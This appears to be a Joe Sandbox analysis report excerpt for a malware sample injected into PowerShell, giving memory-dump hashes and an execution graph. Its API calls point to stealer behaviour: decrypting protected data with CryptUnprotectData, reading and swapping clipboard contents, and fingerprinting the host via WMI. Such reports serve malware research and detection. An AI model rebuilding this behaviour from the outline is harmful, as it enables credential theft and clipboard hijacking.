                                                        • Snapshot File: hcaresult_13_2_6ba0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'q$4'q$4'q$4'q
                                                        • API String ID: 0-4210068417
                                                        • Opcode ID: 110f09c5cd3eb12371f2526fe3e1010622be9a690e70953069a4fcfa4b12d60d
                                                        • Instruction ID: 4ef4839a5e8d3d6827180906e364508bfe80a8d1f8ce792787f7e4a1635cf27d
                                                        • Opcode Fuzzy Hash: 110f09c5cd3eb12371f2526fe3e1010622be9a690e70953069a4fcfa4b12d60d
                                                        • Instruction Fuzzy Hash: 66E15FB4A40315DFEB64DB64C954B9EB7B2EB84304F1081E9E6096B391CB71ED82CF94
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2211582504.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: `Qq$`Qq$`Qq$d
                                                        • API String ID: 0-348965374
                                                        • Opcode ID: 5256db5f8c75b38d2deb20866202025f9f71b7abd8200fdce6884750a9073d07
                                                        • Instruction ID: fb022719e698daa8a19bcb385de66b652149ae534079a5d1fab1ae2fa823f22d
                                                        • Opcode Fuzzy Hash: 5256db5f8c75b38d2deb20866202025f9f71b7abd8200fdce6884750a9073d07
                                                        • Instruction Fuzzy Hash: 3C9145F1B002058FE7149B6898007AEBBF2DFD2210F1885BADA169B241DE35DD42C7E2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2209369154.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_6ba0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'q$4'q$4'q$4'q
                                                        • API String ID: 0-4210068417
                                                        • Opcode ID: 5382b86a44cda468a995c0cfc361e46eef8fca0cd5e1939d4edc339f4856586f
                                                        • Instruction ID: 4f74d6d0fbc711ea67d1966178121041d8be73cfa620daa106a22a8aca3a7737
                                                        • Opcode Fuzzy Hash: 5382b86a44cda468a995c0cfc361e46eef8fca0cd5e1939d4edc339f4856586f
                                                        • Instruction Fuzzy Hash: 5AC16DB4B003159FEB64EB14C984B9AB7B2EB85304F1081D5E6496B391CF71ED82CF95
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2211582504.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (oq$(oq$4'q$tPq
                                                        • API String ID: 0-2772928020
                                                        • Opcode ID: 8ae150ef79d86a8f818cdcfdc2febcf26120a0e09d6d6259258cd203e26b5024
                                                        • Instruction ID: c45f12a631916e4ad24598b55e4031bd1d4a71fdf0e9d766f3b52b445655e302
                                                        • Opcode Fuzzy Hash: 8ae150ef79d86a8f818cdcfdc2febcf26120a0e09d6d6259258cd203e26b5024
                                                        • Instruction Fuzzy Hash: 4F4113F1A012458FDB248F54C841B6ABBF2FF86620F1C82B6E5249F291C731DC42CBA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2211582504.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (oq$(oq$tPq$$q
                                                        • API String ID: 0-3258648728
                                                        • Opcode ID: db19d2c4023aca42957a30d4391705b8123f7896ed4dd3efc7d3b0ea153ea187
                                                        • Instruction ID: 083954affa25db71079d0002d716a68f2f2f15999298ffa9ebb500e0890a492c
                                                        • Opcode Fuzzy Hash: db19d2c4023aca42957a30d4391705b8123f7896ed4dd3efc7d3b0ea153ea187
                                                        • Instruction Fuzzy Hash: 8B4136F1B002069FD7208F589945BAABBF2FF85610F58827AE515AF291DB31DC41C7A1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2211582504.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $q$$q$$q$$q
                                                        • API String ID: 0-4102054182
                                                        • Opcode ID: 32ea1229c01dda080a818c2c24b75fa2a4c05c09612c266c0a2e777c18c9c138
                                                        • Instruction ID: f6e91d4716f8b198df77b83e67f57239ad37696f65f5254f1e21778fd600ffc1
                                                        • Opcode Fuzzy Hash: 32ea1229c01dda080a818c2c24b75fa2a4c05c09612c266c0a2e777c18c9c138
                                                        • Instruction Fuzzy Hash: 7E213BF17103039BFB745D6D5C4072BA6D69BC1615F2C813BA606DB381DD75EA41C361
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2172710117.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2c90000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: pp^$pp^$pp^$pp^
                                                        • API String ID: 0-2757257495
                                                        • Opcode ID: 2b9aeaa619a5f1ece33bc5564d0477321505186a07efa3c1a0f12f545e188fc7
                                                        • Instruction ID: ae915a5dc42892b7d2b37814684f867101afe5c091d2caa28f8d3b7497198403
                                                        • Opcode Fuzzy Hash: 2b9aeaa619a5f1ece33bc5564d0477321505186a07efa3c1a0f12f545e188fc7
                                                        • Instruction Fuzzy Hash: E8318E9291E7D42FE317973968B96853FB1AE1726870E41DBC0C48F0A3E859490BC76B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 6$9$F$Teq
                                                        • API String ID: 0-3653619366
                                                        • Opcode ID: b423cf92b6df1a7f1b15b83534d159802cf635a4015178e8aca6cf62a667bac5
                                                        • Instruction ID: d6f1e465466161836d06d4dc4e45c8cc170bc59c075df8182f7f28ea11fdbe6e
                                                        • Opcode Fuzzy Hash: b423cf92b6df1a7f1b15b83534d159802cf635a4015178e8aca6cf62a667bac5
                                                        • Instruction Fuzzy Hash: BE31BFB0D01258CFEB50CF99C888BEDBBF5BB09304F609099D499AB648CB745E85CF40
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2211582504.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'q$4'q$$q$$q
                                                        • API String ID: 0-3199993180
                                                        • Opcode ID: 277b5236106877daf3f863a8e2f2d8698bd4d148d54147c14d9114b812920b16
                                                        • Instruction ID: 17e0331550512e4d0998effc067256d0c4b8a455850f24cd466a2554aa073f19
                                                        • Opcode Fuzzy Hash: 277b5236106877daf3f863a8e2f2d8698bd4d148d54147c14d9114b812920b16
                                                        • Instruction Fuzzy Hash: 4E01F2A670D3D29FC72726281C201A96FBA5FC391131E81E7D142EF293CD598C4683B3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: )$D$F$Teq
                                                        • API String ID: 0-2768155139
                                                        • Opcode ID: 830e0475edb9953df4efb60bbc1897fa0aeacf3b787f2fa81430a60573903913
                                                        • Instruction ID: 00ca415115db23643b8b0f7497368f00583fb871519723f0f49bb8d22500f542
                                                        • Opcode Fuzzy Hash: 830e0475edb9953df4efb60bbc1897fa0aeacf3b787f2fa81430a60573903913
                                                        • Instruction Fuzzy Hash: 85219FB0D01698CFEB50CFA9D484BEDBBF1BB09304F209099D499AB748D7785A85CF44
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 9$:$F$Teq
                                                        • API String ID: 0-1080486612
                                                        • Opcode ID: 91c7db02f6cb06e3a3797b4f03e00bfa19bb1716b0b11b41ddae3e09c64f3736
                                                        • Instruction ID: 850efede97dd55a096ec5e5f04224c8b4bcb97e319b330679bec10d6e89f607f
                                                        • Opcode Fuzzy Hash: 91c7db02f6cb06e3a3797b4f03e00bfa19bb1716b0b11b41ddae3e09c64f3736
                                                        • Instruction Fuzzy Hash: A111C2B0D05688CFEB10CFA9C444BECBBF5BB08304F209099D499AB749D7B45A85CF04
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: +$.$F$Teq
                                                        • API String ID: 0-2382411813
                                                        • Opcode ID: 797e95f17d8ee1dcd6449907d947dbf908c6cd46aafe37bdfc1307e3fad4a959
                                                        • Instruction ID: 2e2be333f2fdf78ae7855042455efc2a2f8ad3ef3aba94c96c36d3c85626c28f
                                                        • Opcode Fuzzy Hash: 797e95f17d8ee1dcd6449907d947dbf908c6cd46aafe37bdfc1307e3fad4a959
                                                        • Instruction Fuzzy Hash: 4E11A2B0D11698CFEB50CF99C588BEDBBF1BB08304F249099D49AAB748D7B45A85CF44

                                                        Execution Graph

                                                        Execution Coverage:9.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:20.5%
                                                        Total number of Nodes:370
                                                        Total number of Limit Nodes:26
                                                        execution_graph 14576 408a00 14578 408a0f 14576->14578 14577 408cd0 ExitProcess 14578->14577 14579 408a24 GetCurrentProcessId GetCurrentThreadId 14578->14579 14580 408cc2 14578->14580 14582 408a49 14579->14582 14583 408a4d SHGetSpecialFolderPathW GetForegroundWindow 14579->14583 14593 43fb90 14580->14593 14582->14583 14584 408ad1 14583->14584 14584->14584 14585 43e310 RtlAllocateHeap 14584->14585 14587 408bf4 14585->14587 14586 408cb9 14586->14580 14587->14586 14588 408cb4 14587->14588 14590 40ba50 FreeLibrary 14588->14590 14591 40ba6c 14590->14591 14592 40ba71 FreeLibrary 14591->14592 14592->14586 14596 441200 14593->14596 14595 43fb95 FreeLibrary 14595->14577 14597 441209 14596->14597 14597->14595 14598 440384 14599 44039e 14598->14599 14600 4403be 14598->14600 14599->14600 14604 43fc20 LdrInitializeThunk 14599->14604 14603 43fc20 LdrInitializeThunk 14600->14603 14603->14600 14604->14600 14605 42f481 14606 42f48c 14605->14606 14606->14606 14607 42f5da GetPhysicallyInstalledSystemMemory 14606->14607 14608 42f620 14607->14608 14416 4395c7 14420 441660 14416->14420 14418 4395df GetUserDefaultUILanguage 14419 43960e 14418->14419 14421 441680 14420->14421 14421->14418 14421->14421 14609 418e87 14611 418e90 14609->14611 14610 41901c CryptUnprotectData 14612 419046 14610->14612 14611->14610 14612->14612 14613 417506 14614 41750b 14613->14614 14625 43e6c0 14614->14625 14616 417a55 14622 41b950 4 API calls 14616->14622 14617 417d4a 14620 41b950 4 API calls 14617->14620 14618 41798c 14633 41b950 14618->14633 14621 417b25 14620->14621 14622->14621 14623 417526 14623->14616 14623->14617 14623->14618 14623->14621 14623->14623 14629 442e90 14623->14629 14626 43e6ee 14625->14626 14627 43e6c6 14625->14627 14626->14623 14627->14626 14645 43fc20 LdrInitializeThunk 14627->14645 14630 442eb0 14629->14630 14631 442f8e 14630->14631 14646 43fc20 LdrInitializeThunk 14630->14646 14631->14623 14634 41b974 14633->14634 14647 414b90 14634->14647 14636 41ba92 14637 414b90 4 API calls 14636->14637 14638 41bb1f 14637->14638 14639 414b90 4 API calls 14638->14639 14640 41bbad 14639->14640 14641 414b90 4 API calls 14640->14641 14642 41bc5d 14641->14642 14643 414b90 4 API calls 14642->14643 14644 41bcdc 14643->14644 14644->14616 14645->14626 14646->14631 14648 414bb0 14647->14648 14649 442d30 LdrInitializeThunk 14648->14649 14650 414ced 14649->14650 14651 442d30 LdrInitializeThunk 14650->14651 14652 414fa9 14651->14652 14653 415062 14652->14653 14657 43e310 RtlAllocateHeap 14652->14657 14664 41500e 14652->14664 14654 43e330 RtlFreeHeap 14653->14654 14669 415068 14654->14669 14655 4150a2 14658 4154a2 14655->14658 14659 41543c 14655->14659 14660 41545a 14655->14660 14661 415485 14655->14661 14662 4154e7 14655->14662 14663 415499 14655->14663 14668 415468 14655->14668 14677 415512 14655->14677 14701 43e370 14655->14701 14678 414fd4 14657->14678 14658->14662 14658->14668 14658->14677 14723 442fe0 14658->14723 14659->14658 14659->14660 14659->14661 14659->14662 14659->14663 14659->14668 14659->14677 14715 43e720 14659->14715 14660->14658 14660->14661 14660->14662 14660->14663 14660->14668 14672 442d30 LdrInitializeThunk 14660->14672 14660->14677 14665 43e6c0 LdrInitializeThunk 14661->14665 14662->14668 14662->14677 14727 443070 14662->14727 14666 43e6c0 LdrInitializeThunk 14663->14666 14664->14653 14664->14655 14664->14658 14664->14659 14664->14660 14664->14661 14664->14662 14664->14663 14664->14668 14664->14669 14664->14677 14679 43fc20 LdrInitializeThunk 14664->14679 14683 43bcc0 14664->14683 14665->14663 14666->14658 14668->14636 14668->14668 14669->14655 14700 43fc20 LdrInitializeThunk 14669->14700 14672->14661 14677->14668 14733 43fc20 LdrInitializeThunk 14677->14733 14678->14664 14682 43fc20 LdrInitializeThunk 14678->14682 14679->14664 14682->14664 14685 43bcd0 14683->14685 14684 43fbb0 3 API calls 14684->14685 14685->14684 14689 43bdd6 14685->14689 14734 43fc20 LdrInitializeThunk 14685->14734 14686 43c0f5 14688 43e330 RtlFreeHeap 14686->14688 14690 43c10e 14688->14690 14689->14686 14691 43e5b0 LdrInitializeThunk 14689->14691 14690->14664 14692 43be19 14691->14692 14694 43fbb0 3 API calls 14692->14694 14695 43fc20 LdrInitializeThunk 14692->14695 14696 43e330 RtlFreeHeap 14692->14696 14697 43c11b 14692->14697 14699 43c0f9 14692->14699 14693 43e6c0 LdrInitializeThunk 14693->14686 14694->14692 14695->14692 14696->14692 14698 43e330 RtlFreeHeap 14697->14698 14698->14699 14699->14693 14700->14655 14702 43e38e 14701->14702 14703 43e3ae 14701->14703 14702->14703 14735 43fc20 LdrInitializeThunk 14702->14735 14704 415430 14703->14704 14706 43e310 RtlAllocateHeap 14703->14706 14711 43e5b0 14704->14711 14708 43e418 14706->14708 14707 43e330 RtlFreeHeap 14707->14704 14710 43e44e 14708->14710 14736 43fc20 LdrInitializeThunk 14708->14736 14710->14707 14712 43e62e 14711->14712 14713 43e5bd 14711->14713 14712->14659 14713->14712 14737 43fc20 LdrInitializeThunk 14713->14737 14716 43e732 14715->14716 14721 43e75e 14715->14721 14716->14721 14738 43fc20 LdrInitializeThunk 14716->14738 14718 43e7d5 14719 43e85e 14718->14719 14739 43fc20 LdrInitializeThunk 14718->14739 14719->14721 14740 43fc20 LdrInitializeThunk 14719->14740 14721->14660 14724 44301e 14723->14724 14725 442ffe 14723->14725 14724->14662 14725->14724 14741 43fc20 LdrInitializeThunk 14725->14741 14728 443089 14727->14728 14729 4430af 14727->14729 14728->14729 14742 43fc20 LdrInitializeThunk 14728->14742 14729->14677 14731 4430d8 14731->14729 14743 43fc20 LdrInitializeThunk 14731->14743 14733->14668 14734->14685 14735->14703 14736->14710 14737->14712 14738->14718 14739->14719 14740->14721 14741->14724 14742->14731 14743->14729 14744 424d8a 14745 424d91 14744->14745 14746 424da1 RtlExpandEnvironmentStrings 14745->14746 14747 424dc9 14746->14747 14747->14747 14748 442e90 LdrInitializeThunk 14747->14748 14749 424eb1 14748->14749 14750 425027 14749->14750 14753 425011 GetLogicalDrives 14749->14753 14750->14750 14755 421050 14750->14755 14754 442e90 LdrInitializeThunk 14753->14754 14754->14750 14756 442d30 LdrInitializeThunk 14755->14756 14758 421090 14756->14758 14757 4216ab 14758->14757 14759 43e310 RtlAllocateHeap 14758->14759 14760 4210f1 14759->14760 14768 421108 14760->14768 14770 43fc20 LdrInitializeThunk 14760->14770 14761 42168d 14763 43e330 RtlFreeHeap 14761->14763 14765 42169d 14763->14765 14764 43e310 RtlAllocateHeap 14764->14768 14765->14757 14772 43fc20 LdrInitializeThunk 14765->14772 14768->14761 14768->14764 14769 43e330 RtlFreeHeap 14768->14769 14771 43fc20 LdrInitializeThunk 14768->14771 14769->14768 14770->14760 14771->14768 14772->14765 14773 44020e 14774 4400c5 14773->14774 14775 4401be 14774->14775 14777 43fc20 LdrInitializeThunk 14774->14777 14777->14775 14778 40eb8b 14779 40eb94 14778->14779 14808 424c10 14779->14808 14781 40eb9a 14782 425310 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14781->14782 14783 40ebb6 14782->14783 14784 425600 RtlExpandEnvironmentStrings RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14783->14784 14785 40ebd2 14784->14785 14786 427e30 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14785->14786 14787 40ebf4 14786->14787 14788 4283b0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14787->14788 14789 40ebfd 14788->14789 14790 429e70 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings LdrInitializeThunk 14789->14790 14791 40ec22 14790->14791 14792 436080 6 API calls 14791->14792 14793 40ec4a 14792->14793 14794 424c10 RtlExpandEnvironmentStrings 14793->14794 14795 40ec5c 14794->14795 14796 425310 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14795->14796 14797 40ec78 14796->14797 14798 425600 RtlExpandEnvironmentStrings RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14797->14798 14799 40ec94 14798->14799 14800 427e30 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14799->14800 14801 40ecb6 14800->14801 14802 4283b0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14801->14802 14803 40ecbf 14802->14803 14804 429e70 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings LdrInitializeThunk 14803->14804 14805 40ece4 14804->14805 14806 436080 6 API calls 14805->14806 14807 40ed09 14806->14807 14809 424c60 14808->14809 14809->14809 14810 424c76 RtlExpandEnvironmentStrings 14809->14810 14811 424cd0 14810->14811 14811->14811 14422 40df4d 14423 40df70 14422->14423 14426 43b120 14423->14426 14425 40e06a 14425->14425 14427 43b160 14426->14427 14427->14427 14428 43b490 CoCreateInstance 14427->14428 14429 43b4e1 SysAllocString 14428->14429 14430 43b8d5 14428->14430 14433 43b57a 14429->14433 14432 43b8e5 GetVolumeInformationW 14430->14432 14441 43b903 14432->14441 14434 43b582 CoSetProxyBlanket 14433->14434 14435 43b8c4 SysFreeString 14433->14435 14436 43b5a2 SysAllocString 14434->14436 14437 43b8ba 14434->14437 14435->14430 14439 43b680 14436->14439 14437->14435 14439->14439 14440 43b6a8 SysAllocString 14439->14440 14443 43b6d0 14440->14443 14441->14425 14442 43b8a9 SysFreeString SysFreeString 14442->14437 14443->14442 14444 43b89f SysFreeString 14443->14444 14445 43b718 VariantInit 14443->14445 14444->14442 14448 43b780 14445->14448 14446 43b887 VariantClear 14447 43b898 14446->14447 14447->14444 14448->14446 14812 43680e 14813 436813 14812->14813 14816 437020 14813->14816 14817 43705a GetObjectW 14816->14817 14819 437159 14817->14819 14449 40e6ce 14450 40e6d4 14449->14450 14453 4126a0 14450->14453 14452 40e6dd 14459 4126b9 14453->14459 14454 4126c0 14454->14452 14456 41436c CreateThread 14456->14459 14500 422310 14456->14500 14457 414255 CreateProcessW 14457->14459 14458 412d67 RtlExpandEnvironmentStrings 14458->14459 14459->14454 14459->14456 14459->14457 14459->14458 14460 41300e RtlExpandEnvironmentStrings 14459->14460 14463 43fc20 LdrInitializeThunk 14459->14463 14464 43e330 RtlFreeHeap 14459->14464 14465 40b290 14459->14465 14469 442bb0 14459->14469 14473 443160 14459->14473 14460->14459 14463->14459 14464->14459 14466 40b320 14465->14466 14468 40b345 14466->14468 14479 43fbb0 14466->14479 14468->14459 14470 442bd0 14469->14470 14471 442cce 14470->14471 14497 43fc20 LdrInitializeThunk 14470->14497 14471->14459 14474 443179 14473->14474 14478 44319f 14473->14478 14474->14478 14498 43fc20 LdrInitializeThunk 14474->14498 14476 4431c8 14476->14478 14499 43fc20 LdrInitializeThunk 14476->14499 14478->14459 14480 43fbf0 14479->14480 14481 43fbd6 14479->14481 14482 43fbf5 14479->14482 14483 43fbea 14479->14483 14484 43fbc8 14479->14484 14480->14466 14487 43fbdb RtlReAllocateHeap 14481->14487 14491 43e330 14482->14491 14488 43e310 14483->14488 14484->14480 14484->14481 14484->14482 14487->14480 14495 441220 14488->14495 14490 43e31a RtlAllocateHeap 14490->14480 14492 43e360 RtlFreeHeap 14491->14492 14493 43e36c 14491->14493 14494 43e345 14491->14494 14492->14493 14493->14480 14494->14492 14496 441240 14495->14496 14496->14490 14496->14496 14497->14471 14498->14476 14499->14478 14501 422346 14500->14501 14502 44064b 14503 440659 14502->14503 14504 44067e 14503->14504 14508 43fc20 LdrInitializeThunk 14503->14508 14507 4406ce 14504->14507 14509 43fc20 LdrInitializeThunk 14504->14509 14508->14504 14509->14507 14820 40e290 14824 409a60 14820->14824 14822 40e2bf CoUninitialize 14823 40e2e0 14822->14823 14825 409a74 14824->14825 14825->14822 14510 433751 CoSetProxyBlanket 14826 420c90 14827 420cf8 14826->14827 14828 420c9e 14826->14828 14832 420db0 14828->14832 14833 420dc0 14832->14833 14833->14833 14834 442e90 LdrInitializeThunk 14833->14834 14835 420e8f 14834->14835 14511 440953 GetForegroundWindow 14515 441c30 14511->14515 14513 440961 GetForegroundWindow 14514 440972 14513->14514 14516 441c46 14515->14516 14516->14513 14517 410f56 14518 410f79 14517->14518 14519 411238 RtlExpandEnvironmentStrings 14518->14519 14520 40f120 14518->14520 14521 4112a0 14519->14521 14521->14520 14523 4155c0 14521->14523 14524 4155e0 14523->14524 14524->14524 14527 442d30 14524->14527 14526 415739 14528 442d50 14527->14528 14529 442e3e 14528->14529 14531 43fc20 LdrInitializeThunk 14528->14531 14529->14526 14531->14529 14836 5601000 14837 5601102 14836->14837 14838 5601012 14836->14838 14839 5601030 Sleep 14838->14839 14840 560103a OpenClipboard 14838->14840 14839->14838 14841 56010f9 GetClipboardSequenceNumber 14840->14841 14842 560104a GetClipboardData 14840->14842 14841->14838 14843 56010f3 CloseClipboard 14842->14843 14844 560105a GlobalLock 14842->14844 14843->14841 14844->14843 14845 560106b GlobalAlloc 14844->14845 14847 56010e9 GlobalUnlock 14845->14847 14848 560109d GlobalLock 14845->14848 14847->14843 14849 56010b0 14848->14849 14850 56010b9 GlobalUnlock 14849->14850 14851 56010e0 GlobalFree 14850->14851 14852 56010cb EmptyClipboard SetClipboardData 14850->14852 14851->14847 14852->14847 14852->14851 14532 432e6a 14533 432eb3 SysAllocString 14532->14533 14535 43315c 14533->14535 14536 40d8eb CoInitializeSecurity CoInitializeSecurity 14537 40ddeb CoInitializeEx CoInitializeEx 14853 42f92d 14854 42f960 14853->14854 14854->14854 14855 42f9fe 14854->14855 14857 43fc20 LdrInitializeThunk 14854->14857 14857->14855 14858 435032 14859 43507b 14858->14859 14859->14859 14860 4350c1 SysAllocString 14859->14860 14861 435259 14860->14861 14538 43e370 14539 43e38e 14538->14539 14540 43e3ae 14538->14540 14539->14540 14548 43fc20 LdrInitializeThunk 14539->14548 14541 43e577 14540->14541 14543 43e310 RtlAllocateHeap 14540->14543 14545 43e418 14543->14545 14544 43e330 RtlFreeHeap 14544->14541 14547 43e44e 14545->14547 14549 43fc20 LdrInitializeThunk 14545->14549 14547->14544 14548->14540 14549->14547 14550 43aef0 14551 43af18 14550->14551 14553 43af6e 14551->14553 14559 43fc20 LdrInitializeThunk 14551->14559 14555 43b0b1 14553->14555 14556 43b002 14553->14556 14558 43fc20 LdrInitializeThunk 14553->14558 14556->14555 14560 43fc20 LdrInitializeThunk 14556->14560 14558->14553 14559->14551 14560->14556 14561 4359f5 CoSetProxyBlanket 14562 435a4b 14561->14562 14563 42eafa FreeLibrary 14564 42eb09 14563->14564 14565 42ebab GetComputerNameExA 14564->14565 14566 44077d 14567 4407be 14566->14567 14568 44079f 14566->14568 14568->14567 14570 43fc20 LdrInitializeThunk 14568->14570 14570->14567 14571 40dbfe 14572 40dc6e 14571->14572 14573 40dc56 14571->14573 14573->14572 14575 43fc20 LdrInitializeThunk 14573->14575 14575->14572
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000013.00000002.3691471857.0000000000455000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_400000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $"$"$#$#$#$$$&$)$)$+$,$-$-$-$-$.$.$.$/$0$0$2$3$5$9$9$9$9$:$<$=$=$>$?$@$A$C$D$D$D$E$F$G$H$I$K$M$N$O$P$P$Q$Q$R$R$S$T$T$T$T$U$V$V$W$X$Y$Y$Z$[$[$\$]$]$^$_$`$a$c$e$e$f$g$g$h$i$i$i$k$l$m$o$o$p$q$q$r$s$t$t$u$v$w$x$y$y${$|$|
                                                        • API String ID: 0-2167288234
                                                        • Opcode ID: 50487bcd5fc738a55926c5578b8c5c14dbb578578434e882fa16f2861d1aabe1
                                                        • Instruction ID: 8f462645280b069e8c4540548a495f9df384b8d6a10ab6be89c721acee72297e
                                                        • Opcode Fuzzy Hash: 50487bcd5fc738a55926c5578b8c5c14dbb578578434e882fa16f2861d1aabe1
                                                        • Instruction Fuzzy Hash: 2103D07120C7C08AD3249B38C5943EFBBD1ABD6324F184A6EE4E9873D2D7B985858717

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 466 43b120-43b15a 467 43b160-43b1ed 466->467 467->467 468 43b1f3-43b20e 467->468 469 43b210-43b224 468->469 469->469 470 43b226-43b264 469->470 471 43b270-43b2d3 470->471 471->471 472 43b2d5-43b2f7 471->472 474 43b373-43b384 472->474 475 43b2f9-43b302 472->475 477 43b390-43b3a4 474->477 476 43b310-43b329 475->476 476->476 478 43b32b-43b34e 476->478 477->477 479 43b3a6-43b40f 477->479 480 43b350-43b364 478->480 481 43b410-43b41d 479->481 480->480 482 43b366-43b36b 480->482 481->481 483 43b41f-43b46e 481->483 482->474 484 43b470-43b48e 483->484 484->484 485 43b490-43b4db CoCreateInstance 484->485 486 43b4e1-43b517 485->486 487 43b8d5-43b901 call 441660 GetVolumeInformationW 485->487 488 43b520-43b54f 486->488 492 43b903-43b907 487->492 493 43b90b-43b90d 487->493 488->488 490 43b551-43b57c SysAllocString 488->490 496 43b582-43b59c CoSetProxyBlanket 490->496 497 43b8c4-43b8d1 SysFreeString 490->497 492->493 495 43b91d-43b927 493->495 498 43b933-43b954 495->498 499 43b929-43b930 495->499 501 43b5a2-43b5c4 496->501 502 43b8ba-43b8c0 496->502 497->487 500 43b960-43b9bc 498->500 499->498 500->500 503 43b9be-43b9eb 500->503 504 43b5d0-43b5e9 501->504 502->497 505 43b9f0-43ba33 503->505 504->504 506 43b5eb-43b678 SysAllocString 504->506 505->505 507 43ba35-43ba61 call 41d810 505->507 508 43b680-43b6a6 506->508 512 43ba70-43ba78 507->512 508->508 510 43b6a8-43b6d6 SysAllocString 508->510 515 43b8a9-43b8b8 SysFreeString * 2 510->515 516 43b6dc-43b6fe 510->516 512->512 514 43ba7a-43ba88 512->514 517 43b910-43b917 514->517 518 43ba8e-43ba9e call 4083b0 514->518 515->502 522 43b704-43b707 516->522 523 43b89f-43b8a6 SysFreeString 516->523 517->495 520 43baa3-43baaa 517->520 518->517 522->523 525 43b70d-43b712 522->525 523->515 525->523 526 43b718-43b775 VariantInit 525->526 527 43b780-43b7a6 526->527 527->527 528 43b7a8-43b7bc 527->528 530 43b7c2-43b7cb 528->530 531 43b887-43b898 VariantClear 528->531 530->531 532 43b7d1-43b7e2 530->532 531->523 534 43b7e4-43b7e9 532->534 535 43b81d 532->535 537 43b7fc-43b800 534->537 536 43b81f-43b847 call 408220 call 4090a0 535->536 548 43b849 536->548 549 43b84e-43b85d 536->549 539 43b802-43b80b 537->539 540 43b7f0 537->540 543 43b812-43b816 539->543 544 43b80d-43b810 539->544 542 43b7f1-43b7fa 540->542 542->536 542->537 543->542 545 43b818-43b81b 543->545 544->542 545->542 548->549 550 43b864-43b884 call 408250 call 408230 549->550 551 43b85f 549->551 550->531 551->550
                                                        APIs
